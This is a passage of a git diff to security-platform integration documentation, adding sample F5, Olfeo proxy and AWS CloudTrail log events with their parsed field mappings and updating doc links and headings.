the collected data. === "test_file_suspect_detail.json" diff --git a/_shared_content/operations_center/integrations/generated/a0716ffd-5f9e-4b97-add4-30f1870e3d03.md b/_shared_content/operations_center/integrations/generated/a0716ffd-5f9e-4b97-add4-30f1870e3d03.md index c0282aa266..d4def80186 100644 --- a/_shared_content/operations_center/integrations/generated/a0716ffd-5f9e-4b97-add4-30f1870e3d03.md +++ b/_shared_content/operations_center/integrations/generated/a0716ffd-5f9e-4b97-add4-30f1870e3d03.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_1.json" diff --git a/_shared_content/operations_center/integrations/generated/a0dbb8f3-ca1c-4c6b-aafa-595bd430c0cb.md b/_shared_content/operations_center/integrations/generated/a0dbb8f3-ca1c-4c6b-aafa-595bd430c0cb.md index 11fc8decd0..c4fc60b8bd 100644 --- a/_shared_content/operations_center/integrations/generated/a0dbb8f3-ca1c-4c6b-aafa-595bd430c0cb.md +++ b/_shared_content/operations_center/integrations/generated/a0dbb8f3-ca1c-4c6b-aafa-595bd430c0cb.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "connect.json" diff --git a/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af.md b/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af.md index 2303dabe2f..100b07da0d 100644 --- a/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af.md +++ b/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af.md @@ -20,7 +20,7 @@ In details, the following table denotes the type of events produced by this inte | Name | Values | | ---- | ------ | | Kind | `alert` | -| Category | `authentication`, `network`, `process` | +| Category | `authentication`, `network`, `process`, `session` | | Type | `alert`, `info`, `start` | @@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_afm_1.json" @@ -413,6 +413,141 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_asm1.json" + + ```json + + { + "message": "CEF:CEF:0|F5|ASM|15.1.10|Successful Request|Successful Request|2|dvchost=DASEM.example.org dvc=1.1.1.1 cs1=/Common/ASM_ReverseProxy cs1Label=policy_name cs2=/Common/ASM_ReverseProxy cs2Label=http_class_name deviceCustomDate1=May 28 2024 01:46:24 deviceCustomDate1Label=policy_apply_date externalId=111111111111111111 act=passed cn1=0 cn1Label=response_code src=1.2.3.4 spt=51702 dst=5.6.7.8 dpt=443 requestMethod=GET app=HTTPS cs5=4.3.2.1 cs5Label=x_forwarded_for_header_value rt=Jul 31 2024 11:23:28 deviceExternalId=0 cs4=N/A cs4Label=attack_type cs6=FR cs6Label=geo_location c6a1= c6a1Label=device_address c6a2= c6a2Label=source_address c6a3= c6a3Label=destination_address c6a4= c6a4Label=ip_address_intelligence msg=N/A suid=0 suser=N/A cn2=0 cn2Label=violation_rating cn3=0 cn3Label=device_id threatCampaignNames=N/A stagedThreatCampaignNames=N/A microservice=N/A Ipv4AddressIntelligence=N/A IpIntelligenceCategory=N/A request=/path/document.json cs3Label=full_request cs3=GET /path/document.json HTTP/1.1\\r\\nHost: text.example.org\\r\\nUser-Agent: synthetic-monitoring-agent/v0.25.1-0-gf2f001c3 (linux amd64; f2f001c3bee25951947fd2cc5ee345fb7aba93b4; 2024-07-30 21:53:28+00:00; +https://github.com/grafana/synthetic-monitoring-agent)\\r\\nReferer: https://5.6.7.8/\\r\\nX-Sm-Id: -41288030-1\\r\\nConnection: close\\r\\nX-Forwarded-For: 4.3.2.1\\r\\n\\r\\n\n", + "event": { + "action": "Successful Request", + "category": [ + "network" + ], + "code": "Successful Request", + "outcome": "success", + "severity": 2, + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-31T11:23:28Z", + "action": { + "name": "passed", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "host": { + "hostname": "DASEM.example.org", + "name": "DASEM.example.org" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 0 + } + }, + "network": { + "protocol": "HTTPS" + }, + "observer": { + "hostname": "DASEM.example.org", + "ip": "1.1.1.1", + "product": "ASM", + "type": "firewall", + "vendor": "F5", + "version": "15.1.10" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "hosts": [ + "DASEM.example.org" + ], + "ip": [ + "1.1.1.1", + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "ruleset": "/Common/ASM_ReverseProxy" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 51702, + "user": { + "id": "0" + } + }, + "url": { + "original": "/path/document.json", + "path": "/path/document.json" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "synthetic-monitoring-agent/v0.25.1-0-gf2f001c3 (linux amd64; f2f001c3bee25951947fd2cc5ee345fb7aba93b4; 2024-07-30 21:53:28+00:00; +https://github.com/grafana/synthetic-monitoring-agent)", + "os": { + "name": "Linux" + } + } + } + + ``` + + +=== "test_audit.json" + + ```json + + { + "message": "tmsh[28791]: 01420002:5: AUDIT - pid=28791 user=root folder=/ module=(tmos)# status=[Command OK] cmd_data=cd / ;", + "event": { + "category": [ + "process" + ], + "type": [ + "info" + ] + }, + "action": { + "type": "tmsh" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "process": { + "command_line": "cd / ;", + "pid": 28791, + "working_directory": "/" + }, + "related": { + "user": [ + "root" + ] + }, + "user": { + "name": "root" + } + } + + ``` + + === "test_cron.json" ```json @@ -428,7 +563,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "action": { - "name": "CMD" + "name": "CMD", + "type": "CROND" }, "os": { "family": "linux", @@ -450,6 +586,65 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_http_request.json" + + ```json + + { + "message": "CEF:0|F5|BIG-IP|||HTTP Request|Low| src=1.2.3.4 spt=57873 dst=5.6.7.8 dpt=443 requestMethod=POST request=/adfs/services/trust/2005/windowstransport requestClientApplication=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22621", + "event": { + "action": "HTTP Request", + "category": [ + "network" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "http": { + "request": { + "method": "POST" + } + }, + "observer": { + "product": "BIG-IP", + "type": "firewall", + "vendor": "F5" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 57873 + }, + "url": { + "original": "/adfs/services/trust/2005/windowstransport", + "path": "/adfs/services/trust/2005/windowstransport" + } + } + + ``` + + === "test_logger.json" ```json @@ -494,6 +689,99 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_logger2.json" + + ```json + + { + "message": "logger[5533]: [ssl_acc] 1.2.3.4 - admin [15/Jul/2024:02:51:49 +0200] /mgmt/shared/inflate/available 200 2", + "event": { + "category": [ + "network" + ], + "type": [ + "info" + ] + }, + "action": { + "type": "logger" + }, + "http": { + "response": { + "status_code": 200 + } + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "admin" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "original": "/mgmt/shared/inflate/available", + "path": "/mgmt/shared/inflate/available" + }, + "user": { + "name": "admin" + } + } + + ``` + + +=== "test_logger3.json" + + ```json + + { + "message": "logger[20088]: [ssl_req][31/Jul/2024:16:36:53 +0200] 10.129.224.157 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"/my.policy\" 199", + "event": { + "category": [ + "network" + ], + "type": [ + "info" + ] + }, + "action": { + "type": "logger" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "ip": [ + "10.129.224.157" + ] + }, + "source": { + "address": "10.129.224.157", + "ip": "10.129.224.157" + }, + "tls": { + "version": "1.2", + "version_protocol": "tlsv" + }, + "url": { + "original": "/my.policy", + "path": "/my.policy" + } + } + + ``` + + === "test_psm_1.json" ```json @@ -1062,6 +1350,43 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_sshd.json" + + ```json + + { + "message": "sshd[14116]: Connection closed by 10.80.0.111 port 42248 [preauth]", + "event": { + "category": [ + "session" + ], + "reason": "Connection closed", + "type": [ + "end" + ] + }, + "action": { + "type": "sshd" + }, + "os": { + "family": "linux", + "platform": "linux" + }, + "related": { + "ip": [ + "10.80.0.111" + ] + }, + "source": { + "address": "10.80.0.111", + "ip": "10.80.0.111", + "port": 42248 + } + } + + ``` + + === "test_ssl.json" ```json @@ -1353,6 +1678,8 @@ The following table lists the fields that are extracted, normalized under the EC |`observer.vendor` | `keyword` | Vendor name of the observer. | |`observer.version` | `keyword` | Observer version. | |`process.command_line` | `wildcard` | Full command line that started the process. | +|`process.pid` | `long` | Process id. | +|`process.working_directory` | `keyword` | The working directory of the process. | |`rule.name` | `keyword` | Rule name | |`rule.ruleset` | `keyword` | Rule ruleset | |`source.address` | `keyword` | Source network address. | diff --git a/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af_sample.md b/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af_sample.md index 9666d9354f..dc4d1db2e8 100644 --- a/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af_sample.md +++ b/_shared_content/operations_center/integrations/generated/a14b1141-2d61-414b-bf79-da99b487b1af_sample.md @@ -60,6 +60,23 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_asm1" + + ``` + CEF:CEF:0|F5|ASM|15.1.10|Successful Request|Successful Request|2|dvchost=DASEM.example.org dvc=1.1.1.1 cs1=/Common/ASM_ReverseProxy cs1Label=policy_name cs2=/Common/ASM_ReverseProxy cs2Label=http_class_name deviceCustomDate1=May 28 2024 01:46:24 deviceCustomDate1Label=policy_apply_date externalId=111111111111111111 act=passed cn1=0 cn1Label=response_code src=1.2.3.4 spt=51702 dst=5.6.7.8 dpt=443 requestMethod=GET app=HTTPS cs5=4.3.2.1 cs5Label=x_forwarded_for_header_value rt=Jul 31 2024 11:23:28 deviceExternalId=0 cs4=N/A cs4Label=attack_type cs6=FR cs6Label=geo_location c6a1= c6a1Label=device_address c6a2= c6a2Label=source_address c6a3= c6a3Label=destination_address c6a4= c6a4Label=ip_address_intelligence msg=N/A suid=0 suser=N/A cn2=0 cn2Label=violation_rating cn3=0 cn3Label=device_id threatCampaignNames=N/A stagedThreatCampaignNames=N/A microservice=N/A Ipv4AddressIntelligence=N/A IpIntelligenceCategory=N/A request=/path/document.json cs3Label=full_request cs3=GET /path/document.json HTTP/1.1\r\nHost: text.example.org\r\nUser-Agent: synthetic-monitoring-agent/v0.25.1-0-gf2f001c3 (linux amd64; f2f001c3bee25951947fd2cc5ee345fb7aba93b4; 2024-07-30 21:53:28+00:00; +https://github.com/grafana/synthetic-monitoring-agent)\r\nReferer: https://5.6.7.8/\r\nX-Sm-Id: -41288030-1\r\nConnection: close\r\nX-Forwarded-For: 4.3.2.1\r\n\r\n + + ``` + + + +=== "test_audit" + + ``` + tmsh[28791]: 01420002:5: AUDIT - pid=28791 user=root folder=/ module=(tmos)# status=[Command OK] cmd_data=cd / ; + ``` + + + === "test_cron" ``` @@ -68,6 +85,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_http_request" + + ``` + CEF:0|F5|BIG-IP|||HTTP Request|Low| src=1.2.3.4 spt=57873 dst=5.6.7.8 dpt=443 requestMethod=POST request=/adfs/services/trust/2005/windowstransport requestClientApplication=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22621 + ``` + + + === "test_logger" ``` @@ -76,6 +101,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_logger2" + + ``` + logger[5533]: [ssl_acc] 1.2.3.4 - admin [15/Jul/2024:02:51:49 +0200] /mgmt/shared/inflate/available 200 2 + ``` + + + +=== "test_logger3" + + ``` + logger[20088]: [ssl_req][31/Jul/2024:16:36:53 +0200] 10.129.224.157 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "/my.policy" 199 + ``` + + + === "test_psm_1" ``` @@ -162,6 +203,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_sshd" + + ``` + sshd[14116]: Connection closed by 10.80.0.111 port 42248 [preauth] + ``` + + + === "test_ssl" ``` diff --git a/_shared_content/operations_center/integrations/generated/a199fbde-508e-4cb9-ae37-842703494be0.md b/_shared_content/operations_center/integrations/generated/a199fbde-508e-4cb9-ae37-842703494be0.md index 228c7307c1..a082513b87 100644 --- a/_shared_content/operations_center/integrations/generated/a199fbde-508e-4cb9-ae37-842703494be0.md +++ b/_shared_content/operations_center/integrations/generated/a199fbde-508e-4cb9-ae37-842703494be0.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "query_log.json" diff --git a/_shared_content/operations_center/integrations/generated/a1dbed03-cd69-4a51-8ae5-aa67d2f29fcb.md b/_shared_content/operations_center/integrations/generated/a1dbed03-cd69-4a51-8ae5-aa67d2f29fcb.md index a699d8dce9..07c8f5b593 100644 --- a/_shared_content/operations_center/integrations/generated/a1dbed03-cd69-4a51-8ae5-aa67d2f29fcb.md +++ b/_shared_content/operations_center/integrations/generated/a1dbed03-cd69-4a51-8ae5-aa67d2f29fcb.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "admin_login.json" diff --git a/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466.md b/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466.md index 2c9f3e0527..b81e9a24d1 100644 --- a/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466.md +++ b/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "network_log.json" @@ -47,7 +47,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "method": "CONNECT" }, "response": { - "bytes": 1000, "status_code": 200 }, "version": "1.1" @@ -59,7 +58,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "olfeo": { "request": { - "type": "Business Services" + "type": "Business Services", + "type_id": 1000 } }, "related": { @@ -90,6 +90,70 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "network_log_date.json" + + ```json + + { + "message": "1.2.3.4 - jdoe [02/07/2024 07:51:20] \"GET http://example.com/ HTTP/1.1\" 403 - - 0 Unclassified URL", + "event": { + "category": [ + "web" + ], + "type": [ + "access" + ] + }, + "@timestamp": "2024-07-02T07:51:20Z", + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 403 + }, + "version": "1.1" + }, + "observer": { + "product": "Olfeo Secure Web Gateway", + "type": "proxy", + "vendor": "Olfeo" + }, + "olfeo": { + "request": { + "type": "Unclassified URL", + "type_id": 0 + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "url": { + "domain": "example.com", + "original": "http://example.com/", + "path": "/", + "port": 80, + "registered_domain": "example.com", + "scheme": "http", + "top_level_domain": "com" + } + } + + ``` + + === "network_log_no_user.json" ```json @@ -110,7 +174,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "method": "POST" }, "response": { - "bytes": 12, "status_code": 400 }, "version": "1.1" @@ -122,7 +185,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "olfeo": { "request": { - "type": "Advertising" + "type": "Advertising", + "type_id": 12 } }, "related": { @@ -167,7 +231,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "method": "PUT" }, "response": { - "bytes": 512, "status_code": 300 }, "version": "1.1" @@ -179,7 +242,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "olfeo": { "request": { - "type": "Shopping" + "type": "Shopping", + "type_id": 512 } }, "related": { @@ -217,13 +281,13 @@ The following table lists the fields that are extracted, normalized under the EC |`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | |`http.request.method` | `keyword` | HTTP request method. | -|`http.response.bytes` | `long` | Total size in bytes of the response (body and headers). | |`http.response.status_code` | `long` | HTTP response status code. | |`http.version` | `keyword` | HTTP version. | |`observer.product` | `keyword` | The product name of the observer. | |`observer.type` | `keyword` | The type of the observer the data is coming from. | |`observer.vendor` | `keyword` | Vendor name of the observer. | |`olfeo.request.type` | `keyword` | Olfeo request url category | +|`olfeo.request.type_id` | `long` | Olfeo request url category id | |`source.ip` | `ip` | IP address of the source. | |`source.user.name` | `keyword` | Short name or login of the user. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | diff --git a/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466_sample.md b/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466_sample.md index 614326d160..a7fbe0dfbd 100644 --- a/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466_sample.md +++ b/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466_sample.md @@ -12,6 +12,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "network_log_date" + + ``` + 1.2.3.4 - jdoe [02/07/2024 07:51:20] "GET http://example.com/ HTTP/1.1" 403 - - 0 Unclassified URL + ``` + + + === "network_log_no_user" ``` diff --git a/_shared_content/operations_center/integrations/generated/a406a8c1-e1e0-4fe9-835b-3607d01150e6.md b/_shared_content/operations_center/integrations/generated/a406a8c1-e1e0-4fe9-835b-3607d01150e6.md index ab653a425d..1c01863696 100644 --- a/_shared_content/operations_center/integrations/generated/a406a8c1-e1e0-4fe9-835b-3607d01150e6.md +++ b/_shared_content/operations_center/integrations/generated/a406a8c1-e1e0-4fe9-835b-3607d01150e6.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_exchange_added_mailbox.json" diff --git a/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5.md b/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5.md index 4022c45d5b..d6adb8fe88 100644 --- a/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5.md +++ b/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -25,10 +25,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_account_change_1.json" @@ -1577,7 +1576,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -1807,3 +1806,6 @@ The following table lists the fields that are extracted, normalized under the EC |`vulnerability.score.version` | `keyword` | CVSS version. | |`vulnerability.severity` | `keyword` | Severity of the vulnerability. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/OCSF/ocsf). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5_sample.md b/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5_sample.md new file mode 100644 index 0000000000..d7bae59044 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5_sample.md @@ -0,0 +1,3238 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_account_change_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Create", + "actor": { + "idp": { + "name": null + }, + "invoked_by": null, + "session": { + "created_time": 1700239437000, + "created_time_dt": "2023-11-17T16:43:57Z", + "is_mfa": false, + "issuer": "arn:aws:iam::112233445566:role/Admin" + }, + "user": { + "account": { + "uid": "112233445566" + }, + "credential_uid": null, + "type": "AssumedRole", + "uid": "arn:aws:sts::112233445566:assumed-role/Admin/Admin-user", + "uid_alt": "AROA2W7SOKHEXAMPLE:Admin-user" + } + }, + "api": { + "operation": "CreateUser", + "request": { + "data": { + "userName": "test_user2" + }, + "uid": "c99bf9da-e0bd-4bf7-bb32-example" + }, + "response": { + "data": { + "user": { + "arn": "arn:aws:iam::112233445566:user/test_user2", + "createDate": "Mar 17, 2023 5:07:59 PM", + "path": "/", + "userId": "AIDA2W7SOKHEXAMPLE", + "userName": "test_user2" + } + }, + "error": null, + "message": null + }, + "service": { + "name": "iam.amazonaws.com" + }, + "version": null + }, + "category_name": "Identity & Access Management Category", + "category_uid": 3, + "class_name": "Account Change", + "class_uid": 3001, + "cloud": { + "provider": "AWS", + "region": "us-east-1" + }, + "http_request": { + "user_agent": "AWS Internal" + }, + "metadata": { + "log_name": "AwsApiCall", + "log_provider": "CloudTrail", + "product": { + "feature": { + "name": "Management" + }, + "name": "CloudTrail", + "vendor_name": "AWS", + "version": "1.08" + }, + "profiles": [ + "cloud", + "datetime" + ], + "uid": "7dd15a89-ae0f-4340-8e6c-example", + "version": "1.1.0" + }, + "observables": [ + { + "name": "user.name", + "type": "User", + "type_id": 4, + "value": "test_user2" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "52.95.4.21" + } + ], + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "52.95.4.21", + "uid": null + }, + "time": 1679072879000, + "time_dt": "2023-03-17T17:07:59Z", + "type_name": "Account Change: Create", + "type_uid": 300101, + "unmapped": { + "eventType": "AwsApiCall", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "112233445566", + "requestParameters": { + "userName": "test_user2" + }, + "responseElements": { + "user": { + "arn": "arn:aws:iam::112233445566:user/test_user2", + "createDate": "Mar 17, 2023 5:07:59 PM", + "path": "/", + "userId": "AIDA2W7SOKHEXAMPLE", + "userName": "test_user2" + } + }, + "sessionCredentialFromConsole": "true", + "userIdentity": { + "sessionContext": { + "attributes": { + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "112233445566", + "principalId": "AROA2W7SOKHEXAMPLE", + "type": "Role" + }, + "webIdFederationData": {} + } + } + }, + "user": { + "name": "test_user2", + "uid": "AROA2W7SOKHEXAMPLE:Admin-user" + } + } + ``` + + + +=== "test_api_activity_1" + + + ```json + { + "activity_id": 2, + "activity_name": "Read", + "actor": { + "idp": { + "name": null + }, + "invoked_by": null, + "session": { + "created_time": 0, + "created_time_dt": null, + "issuer": null + }, + "user": { + "account": { + "uid": "1111111111111" + }, + "credential_uid": "AKIA3Z2XBVEXAMPLE", + "name": "Level6", + "type": "IAMUser", + "uid": "arn:aws:iam::1111111111111:user/Level6", + "uid_alt": "AIDADO2GQEXAMPLE" + } + }, + "api": { + "operation": "DescribeDirectConnectGateways", + "request": { + "data": null, + "uid": "1c8a6220-4263-4763-b526-example" + }, + "response": { + "data": { + "directConnectGateways": [] + }, + "error": null, + "message": null + }, + "service": { + "name": "directconnect.amazonaws.com" + }, + "version": null + }, + "category_name": "Application Activity", + "category_uid": 6, + "class_name": "API Activity", + "class_uid": 6003, + "cloud": { + "provider": "AWS", + "region": "us-east-1" + }, + "http_request": { + "user_agent": "Boto3/1.15.2 Python/3.8.2 Linux/5.6.3-arch1-1 Botocore/1.18.2" + }, + "metadata": { + "log_name": "AwsApiCall", + "log_provider": "CloudTrail", + "product": { + "feature": { + "name": null + }, + "name": "CloudTrail", + "vendor_name": "AWS", + "version": "1.05" + }, + "profiles": [ + "cloud", + "datetime" + ], + "uid": "71c88be9-ea5c-43c7-8c82-example", + "version": "1.1.0" + }, + "observables": [ + { + "name": "actor.user.name", + "type": "User", + "type_id": 4, + "value": "Level6" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 